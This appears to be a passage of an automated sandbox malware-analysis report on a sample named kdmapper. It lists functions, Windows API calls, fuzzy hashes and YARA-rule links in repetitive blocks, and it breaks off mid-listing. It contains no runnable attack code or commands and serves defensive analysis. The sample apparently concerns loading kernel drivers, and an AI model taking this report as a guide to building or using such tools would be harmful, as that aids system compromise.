Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d5fa1d2af162a2f3ef8074586e819397fd88c8114362f026cdc8ec9575a668e3
Instruction ID: 4618276889a8b254664eb0d7016f01660c419a5518939d4b285e3c59b03d0016
Opcode Fuzzy Hash: d5fa1d2af162a2f3ef8074586e819397fd88c8114362f026cdc8ec9575a668e3
Instruction Fuzzy Hash: 97A011E22AC32ABC300822A02C02C3B030CC0C0FA0332E82EFA02C80A0A880088008B0

Function 00DFE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE580

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 370aa704d462c0a3b3b1ad3c327b27ff5054ffd8a9d5e993f58b3c0f4b0904bb
Instruction ID: 4618276889a8b254664eb0d7016f01660c419a5518939d4b285e3c59b03d0016
Opcode Fuzzy Hash: 370aa704d462c0a3b3b1ad3c327b27ff5054ffd8a9d5e993f58b3c0f4b0904bb
Instruction Fuzzy Hash: 97A011E22AC32ABC300822A02C02C3B030CC0C0FA0332E82EFA02C80A0A880088008B0

Function 00DFE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d57c384aa9a42babf7555c226c5323cf8a5b5180a6c906f67a4b56f1d4f2af4b
Instruction ID: be5e76454d2edf546e10d5232ff754b750626216a9de7e2498b24b5ac0eb8e5c
Opcode Fuzzy Hash: d57c384aa9a42babf7555c226c5323cf8a5b5180a6c906f67a4b56f1d4f2af4b
Instruction Fuzzy Hash: 9DA011E2AAA20ABC300822002C02C3B030CC0C2FA0332E82EFA22C00A2A8800C8008B0

Function 00DFE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 61753c75842a304637605fff0fc6f3960f3d247e9be0698d3a7b212cd04b2076
Instruction ID: be5e76454d2edf546e10d5232ff754b750626216a9de7e2498b24b5ac0eb8e5c
Opcode Fuzzy Hash: 61753c75842a304637605fff0fc6f3960f3d247e9be0698d3a7b212cd04b2076
Instruction Fuzzy Hash: 9DA011E2AAA20ABC300822002C02C3B030CC0C2FA0332E82EFA22C00A2A8800C8008B0

Function 00DFE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b9ce913c73b9ff1d35f8ba2667b344588881b3637d78e6ae81fbb45dd7c6d83c
Instruction ID: be5e76454d2edf546e10d5232ff754b750626216a9de7e2498b24b5ac0eb8e5c
Opcode Fuzzy Hash: b9ce913c73b9ff1d35f8ba2667b344588881b3637d78e6ae81fbb45dd7c6d83c
Instruction Fuzzy Hash: 9DA011E2AAA20ABC300822002C02C3B030CC0C2FA0332E82EFA22C00A2A8800C8008B0

Function 00DFE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE580

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bb35ea60929e9865d101d66775104dc2220ea647806794b3e1ac04f991a71f8f
Instruction ID: a54ecd74c9f1de6eb934819face697babe2d0aaa9e7573e09ccfc7cc766fde13
Opcode Fuzzy Hash: bb35ea60929e9865d101d66775104dc2220ea647806794b3e1ac04f991a71f8f
Instruction Fuzzy Hash: A5A011E22E83283C300822A02C02C3B0B0CC0C0F22332E22EFA02E80A0A880088008B0

Function 00DFE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c247ab1407bc818ae08891abf7c41c5ee7d3ec4e6cb09ac790273a5841980247
Instruction ID: be5e76454d2edf546e10d5232ff754b750626216a9de7e2498b24b5ac0eb8e5c
Opcode Fuzzy Hash: c247ab1407bc818ae08891abf7c41c5ee7d3ec4e6cb09ac790273a5841980247
Instruction Fuzzy Hash: 9DA011E2AAA20ABC300822002C02C3B030CC0C2FA0332E82EFA22C00A2A8800C8008B0

Function 00DE9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00DE903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00DE9F0C

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 0ef8895537ee1edae5f9d0e9e887784963aa45ad3e09c857f6007c8b89ecbc32
Instruction ID: de1930adfd99225f28710ac2f2e1c1e6c3678d9d5d200c011f633b7e728d86cb
Opcode Fuzzy Hash: 0ef8895537ee1edae5f9d0e9e887784963aa45ad3e09c857f6007c8b89ecbc32
Instruction Fuzzy Hash: 55A0113008000A8A8E002B32CA0808C3B20EB20BC030082A8A00ACA0A2CB22880B8A00

Function 00DFAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00DFAE72,C:\Users\user\Desktop,00000000,00E2946A,00000006), ref: 00DFAC08

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 1073ee188ca76be23d2e561b6bf71bf7c7c4cdf2338071565a26c5c2c72e0ad5
Instruction ID: 33ab65b1335b7862d3d19d2b6d6be7d317977da0d7f8d708e28573a9ef1811f7
Opcode Fuzzy Hash: 1073ee188ca76be23d2e561b6bf71bf7c7c4cdf2338071565a26c5c2c72e0ad5
Instruction Fuzzy Hash: 3DA01130202200AB8A000F338F0AA8EBAAAAFA2B20F00C028A00080030CB30C820AA00

Function 00DE9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,00DE95D6,?,?,?,?,?,00E12641,000000FF), ref: 00DE963B

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: bfd729ddbf538dfd1d63a1f4ccdca594f69fab40709b1ab057613fca8ee58ea8
Instruction ID: 65e32d3b81c1915977e444fb5dab4f49035255b4c89383d48aca746a7771c699
Opcode Fuzzy Hash: bfd729ddbf538dfd1d63a1f4ccdca594f69fab40709b1ab057613fca8ee58ea8
Instruction Fuzzy Hash: 2EF080704827555FD7305B35C458792F7E87B12321F085B1FD0E6425E1D771558D8660

Non-executed Functions

Function 00DFC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00DFC2B1
EndDialog.USER32(?,00000006), ref: 00DFC2C4
GetDlgItem.USER32(?,0000006C), ref: 00DFC2E0
SetFocus.USER32(00000000), ref: 00DFC2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00DFC321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00DFC358
FindFirstFileW.KERNEL32(?,?), ref: 00DFC36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DFC38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00DFC39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00DFC3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00DFC3D4
_swprintf.LIBCMT ref: 00DFC404

Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00DFC417
FindClose.KERNEL32(00000000), ref: 00DFC41E
_swprintf.LIBCMT ref: 00DFC477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00DFC48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00DFC4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00DFC4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00DFC4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00DFC4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00DFC509
_swprintf.LIBCMT ref: 00DFC535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00DFC548
_swprintf.LIBCMT ref: 00DFC59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00DFC5AF

Part of subcall function 00DFAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00DFAF35
Part of subcall function 00DFAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00E1E72C,?,?), ref: 00DFAF84

Strings

REPLACEFILEDLG, xrefs: 00DFC247
%s %s, xrefs: 00DFC469, 00DFC58E
%s %s %s, xrefs: 00DFC3F2, 00DFC527

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 9eaba96c046d0f292b6809fec63b72e97ee4c2eacd326e3e60ae97a6777181c1
Instruction ID: 4b465d68234a8ba98b34510e7c4d109d67173f84c925ae38bdc8f7657377b1c5
Opcode Fuzzy Hash: 9eaba96c046d0f292b6809fec63b72e97ee4c2eacd326e3e60ae97a6777181c1
Instruction Fuzzy Hash: 6D91727224834CBFD2219BB1CD49FFB77ACEB8A700F058819B749E6181D675A6098772

Function 00DFF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DFF844
IsDebuggerPresent.KERNEL32 ref: 00DFF910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DFF930
UnhandledExceptionFilter.KERNEL32(?), ref: 00DFF93A

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: e133a5f4841111b3871f3b20ef8f2ca0a7a58d068ff58094afefcd2a6d1158c2
Instruction ID: 1365b6ac797ac5d11167f59c5c139b224ab4ae8348105543a745fcd69484f50c
Opcode Fuzzy Hash: e133a5f4841111b3871f3b20ef8f2ca0a7a58d068ff58094afefcd2a6d1158c2
Instruction Fuzzy Hash: 78312B75D0521D9FDF10DFA4D9897CCBBB8AF04304F1081AAE50CA7250EB719B888F54

Function 00DFE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00DFE5E8,0000001C,00DFE7DD,00000000,?,?,?,?,?,?,?,00DFE5E8,00000004,00E41CEC,00DFE86D), ref: 00DFE6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00DFE5E8,00000004,00E41CEC,00DFE86D), ref: 00DFE6CF

Strings

D, xrefs: 00DFE6C3

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 6ca3b861a11908f01d07f3dc20010a01a893a106884f4f28f506b84e8935212c
Instruction ID: 6e6558d5dac20b8a03bb957b62fce9519cb3d69c5761b872bcb7fe34ce0e6916
Opcode Fuzzy Hash: 6ca3b861a11908f01d07f3dc20010a01a893a106884f4f28f506b84e8935212c
Instruction Fuzzy Hash: 3101A77270010D6BDB14EE29DC49BED7BAAAFC4324F0DC124EE59D7154D734D9058690

Function 00DE6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00DE6DDF,00000000,00000400), ref: 00DE6C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00DE6C95

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 34b11e46b7223fb29704c187409fee76ec31f68b560bfedd820fefac1d23b91f
Instruction ID: 57d2799de5d4399369b8539dbeeace82070ca7b976a28c7c6ddedff2db4e44b9
Opcode Fuzzy Hash: 34b11e46b7223fb29704c187409fee76ec31f68b560bfedd820fefac1d23b91f
Instruction Fuzzy Hash: ACD09231244300BEEA111E728D06F6A6F9AAB59B91F28C404B696A80E0CA74D528A629

Function 00DFF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00DFF66A

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: fd11a7780b97373e58bd377f3e9c9fecdf6f90d79a2a4f0f3742fe392c4fa2ac
Instruction ID: 788211c527ee8c282a6d3690996af8753b7b64bf503c4a029140bca5d9e7d9a6
Opcode Fuzzy Hash: fd11a7780b97373e58bd377f3e9c9fecdf6f90d79a2a4f0f3742fe392c4fa2ac
Instruction Fuzzy Hash: A6519EB1D006098FEB25CF55E8817AABBF0FB88344F29C46AD901FB390D3749945CB60

Function 00DEB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00DEB16B

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 69cd370e30f1ec8008127c702c34df3e0097b6b496fe1891114e23f3153725aa
Instruction ID: 3595697e76efce3939653525247ee5bc86d27e575fb27eea9dbf4319f64f5100
Opcode Fuzzy Hash: 69cd370e30f1ec8008127c702c34df3e0097b6b496fe1891114e23f3153725aa
Instruction Fuzzy Hash: 80F030B4D006488FDB28DF1AEC91AD673F1F758325F1042A5DA15A3390C370AE898E60

Function 00DE6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DE6FAA
_wcslen.LIBCMT ref: 00DE7013
_wcslen.LIBCMT ref: 00DE7084

Part of subcall function 00DE7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00DE7AAB
